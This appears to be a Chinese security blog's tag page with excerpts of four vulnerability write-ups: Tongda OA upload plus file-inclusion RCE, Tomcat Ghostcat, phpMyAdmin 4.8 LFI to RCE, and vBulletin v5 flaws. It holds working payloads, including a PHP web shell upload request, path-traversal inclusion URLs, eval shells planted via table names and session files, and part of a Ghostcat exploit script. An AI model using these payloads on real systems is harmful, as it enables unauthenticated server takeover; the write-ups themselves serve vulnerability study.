Tag:文件包含

Tag (文件包含)'s result:

通达(tongda)OA文件上传和文件包含漏洞重现及分析

0x00 概述 20200317,网上爆出通达oa被利用0day中勒索病毒的消息,官方已出漏洞补丁。 该0day为利用文件上传和文件包含组合利用进行RCE,无须认证。   0x01 影响范围 2013,2013增强版,2015,2016,2017,v11 //补丁只看见v11(2020)有geteway.php(文件包含漏洞)补丁   0x02 漏洞重现 利用v11版本: 文件包含漏洞 http://localhost/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log   文件上传漏洞 上传文件路径在非webroot目录,如: “D:\MYOA\attach\im\2003\ddd.test.jpg” 请求数据包: POST /ispirit/im/upload.php HTTP/1.1 Host: 127.0.0.1 Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.20.0 Content-Length: 633 Content-Type: multipart/form-data; boundary=ee65cd98fdbee896acd30a7b2552b6b5 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”P” x –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”UPLOAD_MODE” 1 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”DEST_UID” 1 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”ATTACHMENT”; filename=”test07.jpg” Content-Type: image/jpeg <?php $command=$_POST[‘cmd’]; $wsh = new COM(‘WScript.shell’); $exec = $wsh->exec(“cmd /c “.$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> –ee65cd98fdbee896acd30a7b2552b6b5– 再利用文件包含执行php代码 json=%7B%22url%22%3A%22%2Fgeneral%2F..%2F..%2Fattach%2Fim%2F2003%2F1941158481.test07.jpg%22%7D&cmd=whoami 或者这样包含也行 http://127.0.0.1/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../attach/im/2003/1044529275.test09.jpg //实测无法直接执行phpinfo(); 利用windows的com组件绕过disable_function() <?php $command=$_POST[‘cmd’]; $wsh = new COM(‘WScript.shell’); $exec = $wsh->exec(“cmd /c “.$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?>   0x03 修复方案 打补丁   0x04 漏洞分析 PHP Zend 5.4解密php文件即可 文件上传漏洞分析 upload.php:5 $P = $_POST[‘P’]; if (isset($P) || $P != ”) { ob_start(); include_once ‘inc/session.php’; session_id($P); session_start(); session_write_close(); } else { include_once ‘./auth.php’; } 要有P参数否则会经过auth.php登录验证,不为空即可。 $DEST_UID = $_POST[‘DEST_UID’]; $dataBack = array(); if ($DEST_UID != ” && !td_verify_ids($ids)) { $dataBack = array(‘status’ => 0, ‘content’ => ‘-ERR ‘ . _(‘½ÓÊÕ·½IDÎÞЧ’)); echo json_encode(data2utf8($dataBack)); exit;……

Tomcat AJP 文件读取/包含漏洞(CVE-2020-1938 )重现及分析

0x00 概述 202002,网上曝出tomcat ajp的文件读取/包含漏洞。 Ghostcat(幽灵猫) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。 —https://www.chaitin.cn/zh/ghostcat   0x01 影响范围 Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 Apache Tomcat 6.x 0x02 漏洞重现 1】 xray   去掉.100的注释,攻击也失败。   2】 Python版 https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 文件读取 文件包含 //修改源码,加上jsp后缀即可文件包含 #!/usr/bin/env python #CNVD-2020-10487 Tomcat-Ajp lfi #by ydhcui import struct   # Some references: # https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html def pack_string(s): if s is None: return struct.pack(“>h”, -1) l = len(s) return struct.pack(“>H%dsb” % l, l, s.encode(‘utf8’), 0) def unpack(stream, fmt): size = struct.calcsize(fmt) buf = stream.read(size) return struct.unpack(fmt, buf) def unpack_string(stream): size, = unpack(stream, “>h”) if size == -1: # null string return None res, = unpack(stream, “%ds” % size) stream.read(1) # \0 return res class NotFoundException(Exception): pass class AjpBodyRequest(object): # server == web server, container == servlet SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) MAX_REQUEST_LENGTH = 8186 def __init__(self, data_stream, data_len, data_direction=None): self.data_stream = data_stream self.data_len = data_len self.data_direction = data_direction def serialize(self): data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH) if len(data) ==……

phpmyadmin4.8.x LFI to RCE

0x00 概述 6月下旬,chamd5团队公开了phpmyadmin4.8的LFI漏洞(须登录),可导致RCE,使用url双重编码绕过限制进行文件包含,再包含session文件或数据库表frm文件即可RCE。   0x01 漏洞重现 环境:win7+xampp+phpmyadmin4.8.1 Payload: http://127.0.0.1:8888/phpmyadmin481/index.php?target=export.php%25%33%66/../../../../../../../../../windows/system.ini 成功包含system.ini。 进入下一阶段:命令执行 方式一:包含frm 先查看data文件路径:show variables like ‘%datadir%’; 在test库中新建pmatest1表,其中一个字段名设置成<?php @eval($_GET[‘lsa’]);?> 再包含mysql/data/test/pmatest1.frm即可rce, payload: http://127.0.0.1:8888/phpmyadmin481/index.php?lsa=phpinfo();&target=export.php%25%33%66/../../../../../../../../../../xampp/mysql/data/test/pmatest1.frm 方式二:包含sess文件 利用php用文件存session的特性,在phpmyadmin里的操作都记录在sess_pmavalue中,该文件保存的路径视情况而定: xmapp中保存在 xampp/tmp/sess_pmavalue phpstudy: /phpstudy/PHPTutorial/tmp/tmp wamp: /wamp64/tmp 在Linux下,常见的文件路径为: /var/lib/php/session/ 在phpmyadmin中执行查询 SELECT ‘<?php @eval($_GET[lsa]); exit();?>’ 被记录在sess_pmavalue中 payload: http://127.0.0.1:8888/phpmyadmin481/index.php?lsa=phpinfo();&target=export.php%25%33%66/../../../tmp/sess_08vi4klpgs54l05fqq5p34d4ia //因为export.php%3f当成了目录,所以要多一个../ /*使用绝对路径也可以,如: http://127.0.0.1:8888/phpmyadmin481/index.php?lsa=phpinfo();&target=export.php%253f/../../../../../../../../../../../../../../../../xampp/tmp/sess_fne7a5ah109htpaqndc5jpi8fn */ //不知为何用写入$_POST包含就会跳转首页……   0x02 漏洞分析 漏洞文件: .\index.php:55 // If we have a valid target, let’s load that script instead if (! empty($_REQUEST[‘target’]) && is_string($_REQUEST[‘target’]) && ! preg_match(‘/^index/’, $_REQUEST[‘target’]) && ! in_array($_REQUEST[‘target’], $target_blacklist) && Core::checkPageValidity($_REQUEST[‘target’]) ) { include $_REQUEST[‘target’]; exit; } target符合4个条件就会includ 1. 是字符串 2. 不以index开头 3. 不在 $target_blacklist名单里 4. 符合checkPageValidity函数要求   找checkPageValidity函数: libraries\classes\Core.php:443 public static function checkPageValidity(&$page, array $whitelist = []) { if (empty($whitelist)) { $whitelist = self::$goto_whitelist; } if (! isset($page) || !is_string($page)) { return false; }   if (in_array($page, $whitelist)) { return true; }   $_page = mb_substr( $page, 0, mb_strpos($page . ‘?’, ‘?’) ); if (in_array($_page, $whitelist)) { return true; }   $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . ‘?’, ‘?’) ); if (in_array($_page, $whitelist)) { return true; }   return false; } 需要返回true,三个if有一个满足true就ok了,都需要满足whitelist: class Core { /** * the whitelist for goto parameter……

vBulletin Forum v5双0day分析礼包

0x00 概述 前段时间网上爆出vbulletin v5论坛的两个0day,一个是文件包含导致代码执行,另一个是反序列化漏洞(cve-2017-17672),本文结合源码对这两个0day进行分析,主要参考https://blogs.securiteam.com/index.php/archives/3573和https://blogs.securiteam.com/index.php/archives/3569。   0x01 rce漏洞 首先看看index.php: $app = vB5_Frontend_Application::init(‘config.php’); //todo, move this back so we can catch notices in the startup code. For now, we can set the value in the php.ini //file to catch these situations. // We report all errors here because we have to make Application Notice free error_reporting(E_ALL | E_STRICT); $config = vB5_Config::instance(); if (!$config->report_all_php_errors) { // Note that E_STRICT became part of E_ALL in PHP 5.4 error_reporting(E_ALL & ~(E_NOTICE | E_STRICT)); } $routing = $app->getRouter(); $controller = $routing->getController(); $method = $routing->getAction(); $template = $routing->getTemplate(); $class = ‘vB5_Frontend_Controller_’ . ucfirst($controller); if (!class_exists($class)) { // @todo – this needs a proper error message die(“Couldn’t find controller file for $class”); } vB5_Frontend_ExplainQueries::initialize(); $c = new $class($template); call_user_func_array(array(&$c, $method), $routing->getArguments()); vB5_Frontend_ExplainQueries::finish(); 大概看出是初始化配置,那就进入init这个方法看看,在 /includes/vb5/frontend/application.php: public static function init($configFile) { parent::init($configFile); self::$instance = new vB5_Frontend_Application(); self::$instance->router = new vB5_Frontend_Routing(); self::$instance->router->setRoutes(); self::$instance->router->processExternalLoginProviders(); $styleid = vB5_Template_Stylevar::instance()->getPreferredStyleId(); 重点关注setRoutes(),应该是设置路由,继续跟进这个方法: /includes/vb5/frontend/routing.php: function setRoutes() { $this->processQueryString(); //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it //$path = isset($_SERVER[‘PATH_INFO’])……